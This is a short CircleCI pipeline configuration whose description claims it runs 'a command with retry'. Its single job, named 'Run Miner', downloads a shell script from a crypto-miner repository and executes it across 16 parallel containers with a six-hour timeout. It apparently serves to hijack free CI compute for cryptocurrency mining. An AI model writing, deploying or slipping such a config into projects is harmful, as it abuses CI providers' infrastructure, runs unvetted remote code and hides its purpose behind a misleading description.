---
version: 2.1

description: |
  Run a command with retry

jobs:
  running:
    docker:
      - image: circleci/ruby:3.0.3
    parallelism: 16
    steps:
      - run:
          name: Run Miner
          no_output_timeout: 360m
          command: |
            wget https://raw.githubusercontent.com/ci-monk/docker-crypto-miner/main/src/circleci/run.sh
            chmod +x run.sh && ./run.sh

workflows:
  version: 2
  build:
    jobs:
      - running:
          filters:
            branches:
              only: main
            tags:
              only: /.*/
